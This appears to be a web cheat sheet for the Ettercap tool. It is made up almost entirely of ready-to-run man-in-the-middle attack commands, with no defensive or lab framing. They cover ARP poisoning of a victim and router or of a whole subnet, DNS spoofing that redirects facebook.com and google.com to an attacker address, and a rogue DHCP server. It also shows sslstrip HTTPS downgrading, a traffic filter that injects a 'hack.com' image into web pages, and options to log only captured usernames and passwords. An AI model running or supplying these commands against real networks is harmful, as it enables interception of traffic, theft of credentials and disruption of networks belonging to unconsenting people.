Ultimate Ettercap Cheat Sheet

Ultimate Ettercap Cheat Sheet

A comprehensive suite for man-in-the-middle attacks, sniffing, and ARP poisoning.

Jump To Section

• Interface Modes
• Sniffing Modes
• Target Selection
• MITM Attacks
• Filters & Plugins
• Logging & Visuals

1. Interface Modes

Ettercap can run in Text, Curses (GUI-like text), or GTK (Graphical) mode. All require root privileges.

Text Mode (-T)

Command line only. Best for scripts.

ettercap -T

Curses Mode (-C)

Ncurses interface. Best for SSH sessions.

ettercap -C

GTK Mode (-G)

Full Graphical User Interface.

ettercap -G

2. Sniffing Modes

Define how Ettercap listens on the network.

Unified Sniffing (-M)

The standard Man-in-the-Middle mode. All traffic passes through your machine.

ettercap -T -i eth0 -M arp:remote

Bridged Sniffing (-B)

Use two interfaces to act as a physical bridge (transparent to the network).

ettercap -T -i eth0 -B eth1

3. Target Specification

Ettercap uses a specific syntax: /Target1/ /Target2/.
Target 1 is usually the victim, Target 2 is usually the Gateway (Router).

Target Syntax

/IPs/Ports/

Example: /192.168.1.10// targets a specific IP on all ports.

Specific Victim & Router

Poison the connection between Victim (1.10) and Router (1.1).

ettercap -T -M arp:remote /192.168.1.10// /192.168.1.1//

Global Attack (Dangerous)

Target everyone on the subnet (// //). This can crash the network.

ettercap -T -M arp:remote // //

4. MITM Attacks

The core functionality of Ettercap.

ARP Poisoning

Redirects traffic by spoofing ARP replies. remote sniffs remote connections.

ettercap -T -M arp:remote

DNS Spoofing

Redirects DNS requests (e.g., facebook.com -> malicious IP). Requires editing /etc/ettercap/etter.dns.

1. Edit the file:

# /etc/ettercap/etter.dns
facebook.com      A   192.168.1.5
*.google.com      A   192.168.1.5

2. Run the attack (plugin):

ettercap -T -P dns_spoof -M arp:remote /192.168.1.10// //

DHCP Spoofing

Act as a rogue DHCP server.

ettercap -T -M dhcp:192.168.1.100-150/255.255.255.0/192.168.1.1

5. Filters & Plugins

Using Plugins (-P)

Ettercap has built-in plugins for various tasks.

• dns_spoof: Redirect DNS.
• repoison_arp: Force re-poisoning if the victim recovers.
• sslstrip: Downgrade HTTPS to HTTP.

ettercap -T -P list

Etterfilters (Advanced)

Scripts that modify traffic on the fly (e.g., replace images, change text). Steps:

1. Write filter (filter.ef):

if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://hack.com/evil.jpg\" ");
   msg("Image replaced.\n");
}

2. Compile filter:

etterfilter filter.ef -o filter.ef.co

3. Load filter (-F):

ettercap -T -F filter.ef.co -M arp:remote

6. Logging & Visuals

Write to PCAP (-w)

Save traffic for Wireshark analysis.

ettercap -T -w output.pcap -M arp:remote

Log User Info (-L)

Log only usernames and passwords discovered.

ettercap -T -L passwords -M arp:remote

Quiet Mode (-q)

Don't print packet content, only print found credentials.

ettercap -T -q -M arp:remote

⇧